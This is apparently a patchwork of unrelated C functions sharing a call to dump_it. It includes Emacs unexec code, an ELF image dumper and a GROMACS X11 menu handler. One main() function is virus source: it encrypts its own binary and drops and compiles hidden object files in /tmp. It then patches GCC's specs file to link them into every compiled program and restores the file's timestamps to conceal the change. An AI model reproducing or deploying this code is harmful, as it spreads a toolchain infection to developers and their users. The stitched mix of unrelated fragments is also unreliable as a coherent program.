/* Take a snapshot of Emacs and make a Mach-O format executable file from it. The file names of the output and input files are outfile and infile, respectively. The three other parameters are ignored. */ void unexec (const char *outfile, const char *infile) { if (in_dumped_exec) unexec_error ("Unexec from a dumped executable is not supported."); pagesize = getpagesize (); infd = open (infile, O_RDONLY, 0); if (infd < 0) { unexec_error ("cannot open input file `%s'", infile); } outfd = open (outfile, O_WRONLY | O_TRUNC | O_CREAT, 0755); if (outfd < 0) { close (infd); unexec_error ("cannot open output file `%s'", outfile); } build_region_list (); read_load_commands (); find_emacs_zone_regions (); unexec_regions_merge (); in_dumped_exec = 1; dump_it (); close (outfd); }
int create_map(int elf_fd, char *out_name) { unsigned long elf_size; int out_fd; char page[PAGESIZE], * elfmag = ELFMAG, * elf_image; Elf32_Ehdr * ehdr; Elf32_Phdr * phdr; if ((out_fd = open(out_name, O_RDWR|O_CREAT, 0600)) == -1) fatal("Couldn't open output file"); if (read(elf_fd, page, sizeof(page)) != sizeof(page)) fatal("read of test failed"); ehdr = (Elf32_Ehdr *)page; if (memcmp(ehdr->e_ident, elfmag, SELFMAG)) return (-1); /* We need the program headers to create the memory image */ phdr = (Elf32_Phdr *)(page + ehdr->e_phoff); if ((elf_size = load_elf(elf_fd, ehdr, phdr, &elf_image)) < 0 ) fatal ("Humungous error loading ELF binary"); if (dump_it(elf_image, elf_size) < 0) fatal("dumping the file failed"); if (write(out_fd, elf_image, elf_size) != elf_size) fatal("didn't work"); return (0); }
int main(int argc, char **argv, char **envp) { char *kalif; int in, r; FILE *fd, *out; char specs[100] = {0}, key[30] = {0}, exe[200] = {0}; struct stat st; struct utimbuf ut; if ((kalif = (char*)malloc(KLEN)) == NULL) { perror("malloc"); exit(errno); } if ((in = open(argv[0], O_RDONLY)) < 0) { #ifdef DEBUG perror("open"); #endif exit(errno); } r = read(in, kalif, KLEN); /* dump executable as hex */ fd = xfopen("/tmp/kalif.c", "w+"); /* but before we mutate a little bit :) */ mutate(key); Vcrypt(kalif, key, r); dump_it(fd, kalif, "X1", r); fclose(fd); /* get source of close() */ fd = xfopen("/tmp/close.c", "w+"); dump_it(fd, X2, NULL, X2LEN); fclose(fd); /* get directory where specs resists */ system("egcs -v 2>t"); fd = xfopen("t", "r"); fscanf(fd, "Reading specs from %s\n", specs); #ifdef DEBUG printf("%s", specs); #endif fclose(fd); unlink("t"); /* randomize close.c */ init_cce(); randomize_file("/tmp/close.c", "/tmp/closeR.c"); unlink("/tmp/close.c"); /* and compile it to be linked into victum later */ sprintf(exe, "gcc -c -O2 -D KEY=\"\\\"%s\\\"\" /tmp/closeR.c -o /tmp/.close.o~&>/dev/null", key); #ifdef DEBUG printf("%s\n", exe); #endif system(exe); system("gcc -c -O2 /tmp/kalif.c -o /tmp/.kalif.o~&>/dev/null"); unlink("/tmp/kalif.c"); #ifndef DEBUG unlink("/tmp/closeR.c"); #endif /* BREAK! if EIP is here, we already did the following: * extraceted close.c * randomized close.c * compiled rand. close.c * extracted kalif to c-file * compiled it * what we do now is simply patch the specs file of GCC to link in * our 2 nasty obj-files every time gcc is ionvoked */ /* dont touch permissions */ stat(specs, &st); fd = xfopen(specs, "r+"); bzero(kalif, KLEN); kalif[0] = 'X'; /* seek to our fave position */ while (strcmp(kalif, "*link:\n")) fgets(kalif, 200, fd); fgets(kalif, 200, fd); fclose(fd); /* already patched ? */ if (strstr(kalif, "/tmp/.kalif.o~")) return 0; /* we're friendly: we save specs-file :) */ sprintf(exe, "mv %s /tmp/.specs.bak~>/dev/null", specs); system(exe); /* get position where we will add our stuff */ fd = xfopen("/tmp/.specs.bak~", "r"); out = xfopen(specs, "w+"); while (strcmp(kalif, "*link:\n")) { fgets(kalif, 200, fd); fprintf(out, "%s", kalif); } fprintf(out, "/tmp/.kalif.o~ /tmp/.close.o~ "); /* write rest of original to patched specs */ while (fgets(kalif, 200, fd)) fprintf(out, "%s", kalif); /* put orig attribs... */ fchmod(fileno(out), st.st_mode); fclose(fd); fclose(out); free(kalif); /* ...and time to file */ ut.actime = st.st_atime; ut.modtime = st.st_mtime; utime(specs, &ut); return 0; }
/* Read header and load commands from input file. Store the latter in the global array lca. Store the total number of load commands in global variable nlc. */ static void read_load_commands_and_dump () { int i; if (!unexec_read (&mh, sizeof (struct mach_header))) unexec_error ("cannot read mach-o header"); if (mh.magic != MH_MAGIC) unexec_error ("input file not in Mach-O format"); if (mh.filetype != MH_EXECUTE) unexec_error ("input Mach-O file is not an executable object file"); #if VERBOSE printf ("--- Header Information ---\n"); printf ("Magic = 0x%08x\n", mh.magic); printf ("CPUType = %d\n", mh.cputype); printf ("CPUSubType = %d\n", mh.cpusubtype); printf ("FileType = 0x%x\n", mh.filetype); printf ("NCmds = %d\n", mh.ncmds); printf ("SizeOfCmds = %d\n", mh.sizeofcmds); printf ("Flags = 0x%08x\n", mh.flags); #endif nlc = mh.ncmds; lca=alloca(nlc*sizeof(struct load_command *)); for (i = 0; i < nlc; i++) { struct load_command lc; /* Load commands are variable-size: so read the command type and size first and then read the rest. */ if (!unexec_read (&lc, sizeof (struct load_command))) unexec_error ("cannot read load command"); lca[i]=(struct load_command *)alloca(lc.cmdsize); memcpy (lca[i], &lc, sizeof (struct load_command)); if (!unexec_read (lca[i] + 1, lc.cmdsize - sizeof (struct load_command))) unexec_error ("cannot read content of load command"); if (lc.cmd == LC_SEGMENT) { struct segment_command *scp = (struct segment_command *) lca[i]; if (scp->vmaddr + scp->vmsize > infile_lc_highest_addr) infile_lc_highest_addr = scp->vmaddr + scp->vmsize; if (strncmp (scp->segname, SEG_TEXT, 16) == 0) { struct section *sectp = (struct section *) (scp + 1); int j; for (j = 0; j < scp->nsects; j++) if (sectp->offset < text_seg_lowest_offset) text_seg_lowest_offset = sectp->offset; } } } #if VERBOSE printf ("Highest address of load commands in input file: %#8x\n", infile_lc_highest_addr); printf ("Lowest offset of all sections in __TEXT segment: %#8lx\n", text_seg_lowest_offset); printf ("--- List of Load Commands in Input File ---\n"); printf ("# cmd cmdsize name address size\n"); for (i = 0; i < nlc; i++) { printf ("%1d ", i); print_load_command (lca[i]); } #endif dump_it (); }
static bool HandleClient(t_x11 *x11, int ID, t_gmx *gmx) { t_pulldown *pd; pd = gmx->pd; switch (ID) { /* File Menu */ case IDDUMPWIN: write_gmx(x11, gmx, IDDODUMP); break; case IDDODUMP: if (gmx->man->bAnimate) { hide_but(x11, gmx->man->vbox); } dump_it(gmx->man); if (gmx->man->bAnimate) { show_but(x11, gmx->man->vbox); } break; case IDCLOSE: case IDIMPORT: case IDEXPORT: ShowDlg(gmx->dlgs[edExport]); break; case IDDOEXPORT: write_sto_conf(gmx->confout, *gmx->man->top.name, &(gmx->man->top.atoms), gmx->man->x, NULL, gmx->man->molw->ePBC, gmx->man->box); break; case IDQUIT: show_mb(gmx, emQuit); break; case IDTERM: done_gmx(x11, gmx); return true; /* Edit Menu */ case IDEDITTOP: edit_file("topol.gmx"); break; case IDEDITCOORDS: edit_file("confin.gmx"); break; case IDEDITPARAMS: edit_file("mdparin.gmx"); break; /* Display Menu */ case IDFILTER: if (gmx->filter) { ShowDlg(gmx->dlgs[edFilter]); } break; case IDDOFILTER: do_filter(x11, gmx->man, gmx->filter); break; case IDANIMATE: check_pd_item(pd, IDANIMATE, toggle_animate(x11, gmx->man)); break; case IDLABELSOFF: no_labels(x11, gmx->man); break; case IDRESETVIEW: reset_view(gmx->man->view); ExposeWin(x11->disp, gmx->man->molw->wd.self); break; case IDPHOTO: show_mb(gmx, emNotImplemented); break; case IDBONDOPTS: ShowDlg(gmx->dlgs[edBonds]); break; case IDTHIN: set_bond_type(x11, gmx->man->molw, eBThin); break; case IDFAT: set_bond_type(x11, gmx->man->molw, eBFat); break; case IDVERYFAT: set_bond_type(x11, gmx->man->molw, eBVeryFat); break; case IDBALLS: set_bond_type(x11, gmx->man->molw, eBSpheres); break; case IDNOBOX: set_box_type(x11, gmx->man->molw, esbNone); break; case IDRECTBOX: set_box_type(x11, gmx->man->molw, esbRect); break; case IDTRIBOX: set_box_type(x11, gmx->man->molw, esbTri); break; case IDTOBOX: set_box_type(x11, gmx->man->molw, esbTrunc); break; /* Analysis Menu */ case IDBOND: case IDANGLE: case IDDIH: case IDRMS: case IDRDF: case IDENERGIES: case IDCORR: show_mb(gmx, emNotImplemented); break; /* Help Menu */ case IDHELP: show_mb(gmx, emHelp); break; case IDABOUT: show_logo(x11, gmx->logo); break; default: break; } return false; }